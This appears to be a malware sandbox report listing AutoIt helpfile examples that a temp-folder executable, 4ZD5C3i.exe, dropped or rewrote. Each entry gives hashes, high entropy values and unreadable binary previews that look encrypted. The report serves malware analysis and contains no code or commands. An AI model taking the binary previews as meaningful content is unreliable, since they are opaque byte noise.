                                                                                                                                                                                                                                                Preview:.4..u.]..."..H=*..J.x.E..4..p........^N..(.vf..zsY.U.......r...}..y.b...?..UA..M.xXz{n]$R..=....x.$.,v...`.S..Yl...wX".4'6...AV.2b....L.(..c..f.qE......I.;4r...H............T..w...5._.@. ...s.Zd..d2. .u6...w.U}...Ce..z...5Z.O..._..{.._.c.o..]....`.^.MM/....<i.@.@.|...J...^..3....OV....c....C}j.",.....&....2..VU._....%2?.^e.....:..........s.n.Xd.i..-.........u....*.._....1._J..U..:.h.+.,o.p..U/.O...R..'eB..y.Y4...n..#.}..g..\.f.4.>.....{.........vM.y..._..*...m.0ob..x.,.'..3..t\.!.}.g.H.x....."Q.;.:..;........F<s...VU....._Q.Y..o.<......xs..y3..w|(.P...>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_ArrayReverse.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):939
                                                                                                                                                                                                                                                Entropy (8bit):7.75064065816401
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:lZrEv10GKTSQg2h6LCyjmJrc0YXUZtwsT7iL:lZIedT1th6Lj4o0jZtwQi
                                                                                                                                                                                                                                                MD5:D1CE53D6645ADD4A579E69DE4B99F452
                                                                                                                                                                                                                                                SHA1:C96816176C2FB5A68B53C58C46EBF04776FE318E
                                                                                                                                                                                                                                                SHA-256:F7936511A67E73B46A71E2CA83C76AB88CA3D7DEE0200B5A72FFCF21A9477064
                                                                                                                                                                                                                                                SHA-512:5939B3921F1CA7385BDD28CE4995E063758A74C152C8A97E3AE700E435B4707AC4F1F3EFC0C0D1910AE51980B1043B29ABF243C7310E31D7DA9A51872AE8E7C9
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:....z.......E+.69~VB.....NT.....A.D.XD<.....X>..f.~.|L:.&T.gx....a...n;.M.."`<..Xuy)..1.8v...{..e..M..P.:rd.|W...-A[.{.m..\...V.jW.{..Fq&.r.C...;....ZO.]*Q....cX.@f.+n..........**..;.A.).....;Y....:....I......._sg.Jf..;g.....mP.&DD..I...LS.mh^q....>...............R\y..,....7. .@...F.....@<.z..0.Z..4..3.B..sI.`...>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$...,.i.......J..c.....{.,..]..`.]mzK...................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_ArraySearch.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1169
                                                                                                                                                                                                                                                Entropy (8bit):7.811681091596941
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:Jlyz6nR6vB+o1+1E5SKCnvFm4chOC4YmALdjmJrc0YXUZtwsTS:JlnsSXKCvFfcoC4FALl4o0jZtw9
                                                                                                                                                                                                                                                MD5:26F689371D8ED2AE525BDB65D000B94E
                                                                                                                                                                                                                                                SHA1:6BB772D52EFCB790453FABCF9AAE3E5DD1A5885A
                                                                                                                                                                                                                                                SHA-256:F6AA23034B5DED311EB17EA7B42729518990448BE5A334D4AF0990A499C50434
                                                                                                                                                                                                                                                SHA-512:275839BE91CBDE168AED903348C8AC6AD48DFE14FC2AF4A763122ADCAF24544DB7420FCE8A76960F68A21956E99493E984F8404A9CEE166CEA3BAD09ABA1B29F
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:[..[prv....J.u}...n.:.<.Q.>.<...aPz.6..........f...........o..h..u.&..R.XZ<O...:v.];.'.Q>:.).x6.<..5G.:.......)..b.. ....6..@..m.'.TC|.n.]+.*:...n..I.M.z...7..J..Q..`.A.L3g.zc\Sg-)..:....V.....y0....MNFK...O9..p...q...*A...>y...J..}.R......h...9.+B..AF..?..0.W..\..8...H.eG..J..h..F_L0.>{I,...*l.d..C[7..hk....(.;.&..M;.HGB`..X\`D.....T..D..(...GG.9a...C.Q..si..|8..j/.M35..\..B6..sk].[..#S....I<+...".S.)G..VjU..Q..........Xw...8...6.,.a....P.M.35#"r.9...t..3..qG...S.p^u..w'n..f...Zw.((...hX.......... [...w._S..]\X.M......{9i.@z1..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N..

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_ArraySearch[2].au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1500
                                                                                                                                                                                                                                                Entropy (8bit):7.859252373697504
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:UoqcypkNqdBDigmQUUjn/fdK4oq6fqLGA2ssb1XPL3edujmJrc0YXUZtwsTy2DhT:UoqVpksddhHTdKAFLo1redg4o0jZtwhC
                                                                                                                                                                                                                                                MD5:153E6A05E48044E78C149148CC580534
                                                                                                                                                                                                                                                SHA1:8F33434FE3A357862AD669F592291397BD4E72DF
                                                                                                                                                                                                                                                SHA-256:2F7E4029DDAEC4B2AFFCE66007EF9E584F5158DF3F56DF4A659B6C3D161D4E98
                                                                                                                                                                                                                                                SHA-512:A9E479260CA6FF9DD92B847CE63C0F4BABCDE296DD9BCBC1B5D90CCECD1D10224501E26DFDFB3542E21D8350469D20A64CC9F0F9C0CB0ED9961729821976C804
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:P.T.pG.3F.:I.......;*F....p.e..-v..j.....bo.F......M..L..'...L.....Z....5.zs*...#.g..D..Z..X`S._>u.0...$h.....fOb@K.LMJ..ax...t....IM`....g.....f...<..4.........u..z.O=nfI.B.....8...B..!q...uV[.%..@...4..'...P.3T.........v....T.7I.0.....O..%..8f].Gg...k....c..p........]n....p.Hm6.......R%...i.........p.g...t......c...G...q.yQ...M.x#u..G.S.n..m.^L"....u..a.\...@X..B.I.!-F..<..Hv~..lT.$.uvMW.H.X........y.c......\Y..O.w......i3oFv.H....5.)...h<..]-....qx).C..P4.9../..<...m3C.Wp$..I<..L(Q.6w.#.(7.O.,..ppYb.{..ol.......d..P.."..u...gm].\\D.$. .D.......]...|...o$.F.E..R.....A.....&..}.....%.d..5...D.K|0q.)z.<hr.....=.&.....V./]...+..f$..x...@..>u....G...L..e<..{...~..3....!.o..:Xg.(.>OO....g3.m@....(..c. \.....c.. ....k.8.l2...Yk..G>..=.se-..Q(.......d.d..g.v)&.V..@F..!....)^...v.fr........@.MN&..Y#g...h...V......U..v.....W0..L.v..To..C....>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_ArrayShuffle.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1376
                                                                                                                                                                                                                                                Entropy (8bit):7.851110660306149
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:cqcRACUie4zCKTYRbvjbQZ/0MRBN8jSU0heMIRCjmJrc0YXUZtwsTC/0Dzk:cjRArbpRbvjcZ/0MfN8epIW4o0jZtw5Z
                                                                                                                                                                                                                                                MD5:8D4A5854153D96ACB568E0FF65EEFF0D
                                                                                                                                                                                                                                                SHA1:3F8FC3173A4A4C8F9A7C9F667D65DDCA850BC6A3
                                                                                                                                                                                                                                                SHA-256:511133D6823F30A7F878ADE9AC8DFE3D01263260F2FC1BDE2BE8C53B1F1E6779
                                                                                                                                                                                                                                                SHA-512:48DEA00482B734830BB6C1EB346959A17F4DAD7AC70316B882A30A47DFA13E51BD5E2BEA6A7CBD55A27341523C8F8211DB8CC0E673D4B230C8F3E38FAB518D6C
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:v.!%.'[....X8....n..Zq@.....F?.5....4!mQ...........R..*....'....2.t....BwI!..].Y..Y.L..fV.HG.IAu..S...V.e<lw].D..|.g.^..*]D3.6..&....?...L...H.n...Ha..;.S-..._un.2.....A4......K`...|.Hd.I"......F.nm....)yP..C..O....j{..+...x.l...3...h.\T.=/s(..w..M.T.....i....7...r....I...7?0./...w0..cIAkt....*2....j.9....>....m.T?.1\,.r......2Q....i...m.b..8h.).....n.....O...+....$.#).@+i.G..z.,K.....j.=<.a....kp....t........2.gw.Q...@.Ea.\6M-.T..>~...E...}H..w..P.....%.5.7.LlVz.9z9...`=UUq.]~C.M.K}Hzl1....$..h..(..U.pE.......xB;.8.yI5...\..g....2..}.C.Y@..... .T@.f.cxtJ..j{.... ..6PR. R.A....5 _...~.p..<........<....o..v.qG.$...qVp~.I..-.u.uTL......@.J..JY../d:.A-?$.D_N.(..d.2..ibp..~.Hz..*.d..C.t.`.W..E."T.9y..."*~...8...I).M..\.h..H.BY.......>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N..

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_ArraySort.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1101
                                                                                                                                                                                                                                                Entropy (8bit):7.801114451928345
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:pTRWleA8ogp73OCMnkx5L3AbHjmJrc0YXUZtwsTq4:pTRwbgRMnc3aD4o0jZtwK
                                                                                                                                                                                                                                                MD5:7C522C951F4C4B72C971F8625F30C908
                                                                                                                                                                                                                                                SHA1:55800375DC3AF800E99DB3A3AF93E2CBF4DDC2B3
                                                                                                                                                                                                                                                SHA-256:17677AF1DE23FC1204D359E9A4A5ED803921A56EFC3C97489B4C9B1215266C0B
                                                                                                                                                                                                                                                SHA-512:443B556A41C1BB50E78E09D89DCBA7355E400130759A7A8CF3D0415AD21CC30FB5AEFD2FFCE275EF9EFEBDD35988F6E0829ADD717801804B3848FA85A374096F
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:....{=J.e.u.yS(..B..4.?j.{.kj].>..-.v.y5..s.i...v=m^..nA..#0..iv~V....-/....c.g...u..y..w..w...iq9...{WPW.......C......B.$....Q.*.=.n.&.|.....Q.A.M...L..n..D..w#..if.zT.*..N..d.D..s.6.o.B.....E...p.......b/..:'.%8...].W\'....I.7.X.X"..x.n..tqvx.u..f^T......r.....n.hg..T.._..(..V.-l.....%.... ..m,,....\c.P.\y.VS{......t',Y.4.T.u`gB.#.......v.S...d...3.gu`H.................Y(..Zj.j...b...7.sWX.....^..0.F~..`=..z:.Q.......>..{.Q.N.'..$h.2D$0j........<...6...\...xh...>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&.

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_ArraySort[2].au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1151
                                                                                                                                                                                                                                                Entropy (8bit):7.7970944802079565
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:wwd+X4q0rLf9uiAhn2gjmJrc0YXUZtwsTWjvbfs:wRX4q0vHAhJ4o0jZtwxzs
                                                                                                                                                                                                                                                MD5:F4B9DC8CAA75EEB854414222ED2581F6
                                                                                                                                                                                                                                                SHA1:664B0B2BDE23FAF15BE4758122A909DDF5995B05
                                                                                                                                                                                                                                                SHA-256:F13488CCB2DC5FEBD32288F5720CC4A6582F07BB8EF771E8B222DFBB01EB7E2A
                                                                                                                                                                                                                                                SHA-512:8A09B904A04D9FA06F16AEFCE331787890584DAE70F5010BFE906B027C616B4227B6D561558341C371FCD73D2DB14B23F9B604ED684A34A65437955638230AD3
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.09.h..D.>..e..H..D..9g..f-\...VY8.$..1...Q...4..xN..VF....tf..h|V~.me......7 ."....e@.@..z\..'......]~.4..|f>.b..xKW...!..>.L.....c.._M./=.t...M...?U(ef.............H{k....0.x...G....?....L...R8.2.4.A....p.........$1...k...>./.~...j.D.v.D...B.....u^....2..".k.....9_[....A1..s&..i......!...B.,na?..c.:..{.y6.uA5s~.G..(.j...{..0.V&..A.=.T:.-...P...m...............3]4.c[.g.."G.E.......O..T ..9.(..Ry7n.....J.q...("T.......5.N=.......b7......a..:.s!A..xrCQ...[k1.RPTP`4....y...._......9.y..Pv../.p{.=6...o.+."..{y=..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_ArraySwap.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1535
                                                                                                                                                                                                                                                Entropy (8bit):7.857333033166618
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:vIMrw1J4Sq6Q3VQXIdWvDVo3Ut9m5VzNu2v85jmJrc0YXUZtwsTef:vIMedQCsW7C3sATvU4o0jZtwDf
                                                                                                                                                                                                                                                MD5:6FC9505837A7FEB03392C6E35131447C
                                                                                                                                                                                                                                                SHA1:6CB6A776327CF87A9EC721110AC16790454EBCB2
                                                                                                                                                                                                                                                SHA-256:1F04051F6C11A9B421011E65B1DD040717996C4E299CF94CC435667695744281
                                                                                                                                                                                                                                                SHA-512:21BF791012B529404E9EF9C40A314D5C57D56D50042972EBA0D683E720C88EB454ED33D2F13B1F3FFE23624B47546877E4DEC2FD5876DA75DF180BEA79AB6B5C
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:F.]..z../..=.zT...\....i...T.......4.y.+....5.....1.Q.W.l..Fn.......M..^.....y..)]....V. .Z......OJ..N....Z....q-....Wu..Y.Rp..*..h~EdP...o...!.......0..%N.m..-?.....L.L.)...;....}.|..#ZY...?D.P......h.....!....U....B....?.. .h.J.i..z...@....s.8r......l........|..+../_.[..?...O.%.oj.,L1.....y..i...........*H.H...F...%...[l...i.Q.._t!...t....~.Na......<.EEp..."<Rf.q..,.%.-...k.Tnx`..I.a<..0.n...+*J.6...;.]*o.+...Ij....D.f...d....B`.....4....k..1{..?..5.Y.a..............?.]Hv._z..{.%Jk....e........|?....Q.....h .".;:....M..".-.........3x...x......_v.j..Q......';........y..J0E4$.......b1D.:`.<..:...#..x<.-.YJ.....V...I....#f..Tk.T.{..e..:..yLdi...}...Ht9.5..jp,y.}.g..owV)]Ci.E..T....%..<. ....M..V..."...}.`......|.h^..o.(f..T..c..#.......U ..h.K....T_B@.......;......9........@.(...~ ........WY.....&.20........w.. ..d...$....E.......Qg'....n..p ....c.n..CL....Z.+W&.....>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_ArrayToClip.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1103
                                                                                                                                                                                                                                                Entropy (8bit):7.80495342936955
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:fs8lBMToBzl0hohX5M6Yu2afojmJrc0YXUZtwsTTve:fsItBzi6NvZf24o0jZtwWe
                                                                                                                                                                                                                                                MD5:57D3F8CEFEEC6B88613313BF9D4E246D
                                                                                                                                                                                                                                                SHA1:1475B440FA29ECABC18111D0595306B8A4F1CF39
                                                                                                                                                                                                                                                SHA-256:A67711A32DB1CD54E1965A9DC69335E23535339F671F58685840A083E72A8247
                                                                                                                                                                                                                                                SHA-512:3A7001EF4A8154A1DAFB4BC1B16749FF9E6B28FC039A1D20C513DE93326FD04F4A86E703E9BF0FF65DB7D539269C5D9932E636B16DA1497546D30A243B27EA6A
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:(.@G.0`$.7l!.'7PA.g<...].h.....&.0...K...a.............5%r8.`.........6..Y..A..e.S(.wo.m..G.@.|.$.Ky.O.....'`{..%@........._.....!3....$.}.}........e..X.*..!=....#|...Y..n....8...>..e.!.%.>..R8+...."@.*.....>..|..+.n....Q..dQ.f[...K..TgV.*.V.....]i.bP.rO.X.~]..n..'........Q]q..>K.M......B..&n..u.......3.Dy....2.;#_=.>.| .qj ...M.93.17I.,.....@u........x.....^........C....lAw$._3w...i8..xg....W..2_.3..sY).......sp.. ..y......b....R......L<..rgE..(..G0W....-n.Q....M.6ZS..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_ArrayToString.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1081
                                                                                                                                                                                                                                                Entropy (8bit):7.794860901074694
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:KE1cyPgV01WeqXxN2DXt0ljmJrc0YXUZtwsTbSfmF:D1cd1hD2DyN4o0jZtwasmF
                                                                                                                                                                                                                                                MD5:0D42BB0A18D4079EC155ADEEE466A187
                                                                                                                                                                                                                                                SHA1:7082BCA46DBBDBD7878129E1C9714DAB4D4427B4
                                                                                                                                                                                                                                                SHA-256:507CEA563A0D0A345ED2B155162FD040029AFCBBF4E2E5413EE551683DE885D0
                                                                                                                                                                                                                                                SHA-512:34D5644C295A51C15F190D312D0B80AE91146518535FA56164C3837BF03A6A4C09B7573B5B322A06FC2EF197A7E2FF3625EC336574A34E070534681E02F62BDE
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..KL.(..M`..fkU.-..7K. ....u.....l...j....u.-......_Y....dz.v.&w./:O.].jZ.....X..P0..LfC........,...._".. iA.....>.?.!0..xq{.d.yHy].j....k{O...v..r.._.....}..Yv.S.....t.O?.e..Bw..*.....*aT.P;0......r:~..n.oz..@o..\,...").?.g=.6..D.,.1....B./ZiE.,...ol..cD..5.`|b...G.....I..P.......3.h..V>.O..:..9.{.....j,../l...{.....Q...{...&.7N.h.zLs.q......>....w.0...x.%at..2%R^.\.J..L.k...f.pKMw..8....t`O.......:.%`..}...g*...e...~a.&..4.)1.......g.Pb/...i.og.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_ArrayTranspose.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1248
                                                                                                                                                                                                                                                Entropy (8bit):7.817221028534489
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:UFXRpgEuocX17+bG98vSYjmJrc0YXUZtwsTKBbAa:UFXRhuocX17+bZam4o0jZtw/xAa
                                                                                                                                                                                                                                                MD5:46FB2AF42D998F11C7AA7B217F0B1EA4
                                                                                                                                                                                                                                                SHA1:A94CE2288435DA5416075C7ED79BFFF8D1BB213E
                                                                                                                                                                                                                                                SHA-256:E4A5FE4874D3E2BB9EC37B2710F15FE02710FCAC6FFE3770D34B79146F43C7C5
                                                                                                                                                                                                                                                SHA-512:877F8EDB3686EE659C1A1DB871CEE1054DA0D5E3B93727A12B1D9845D2DF7613E32DDA1E534E5F2401F96AF738CB839714CBDD1DD838BA3D54148BCEC542A59E
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.x.J......./\..".8v...Zg-..D......s.`4.L..%..I..o.W.6v.RN.B.y..uX....1.G.....0...gG..<_.....J9..`. .BTN...i.9.....Y...I.....O.e07J.#..l..S-....O....(......~.....ff.....8..>..+..(..%..^....p.=......~....L&.]..)...|.Zs|..H.x.N..1.8..+.........j\.m..."v..6..j...Y..>.......`SE,.d.m..\...h.9.\s..v.......`..Zdp...#...=..hRv..~.7.._MD.Bo.8.....}...r...,..........l......t...F.%$'q...Q..['.a..z..D...s.a...."....O1.;y9..2gK....).+..)....//...}.WNXl.0.Q.e6|/X..!.......%5..;&.......D.....=;2....,..1..C.(g..{....f.8.q..w.5i..:...|......)..b...&.?..X...]>}.,.@T. ...'.)..&x!...#Qu\...@Ng..J)...=..1..*... <RL...p0...VW...n.$.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_ArrayTrim.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1117
                                                                                                                                                                                                                                                Entropy (8bit):7.80636784251407
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:t1uwBmtaWJzSA6Cvs+7+scjmJrc0YXUZtwsTp:t3BmtvzSfX+7+si4o0jZtwG
                                                                                                                                                                                                                                                MD5:290C0FCBC990373A8FD036211BB2442D
                                                                                                                                                                                                                                                SHA1:50BCD936D4409D81F68297B683BFBA429128263C
                                                                                                                                                                                                                                                SHA-256:1FE254AF06CC68C33DEC86F0317EF58A68A88B360880D159545058C8FECD6E96
                                                                                                                                                                                                                                                SHA-512:9144F60B11CE2639C38D9C5F2C46B845AEE54AFC252B77558BCC83C4594BEBA6127ED4908A5166B0EC297118E1A525E0FC5427DF6A31AAC7E7186D1360801188
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.S.b.I.>.d.&...O.qV..[tET.p..ou.b.H9K.:l.g...hK...T.....N...v..uNL7.Ao.{......L.\:.x...1..L..+.VR...B..e......b/..X.2.oU.{F.......>....pR..[s........z......A...c1.N.`%i..UR.-..>".{wo:7OP.'H..I.4.z..o.q.B-.... ....&...8$5..;.I3..)B....UQ#0.ia.AT...M.2>.....).....S........u.....m..w..%.2,..d....5.~..S2.x?o.L~...x.5qg..1.....SN..7K...TI.....2.y....A..O...._.m....9........2q......H!....X....#..U3.....t......%D..%b59y...Bq.=]...)I..$ F&+.....jl.X9.f3...\I..a..".k.HI.I..(j...>{.^.<.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#j

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_ArrayUnique.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
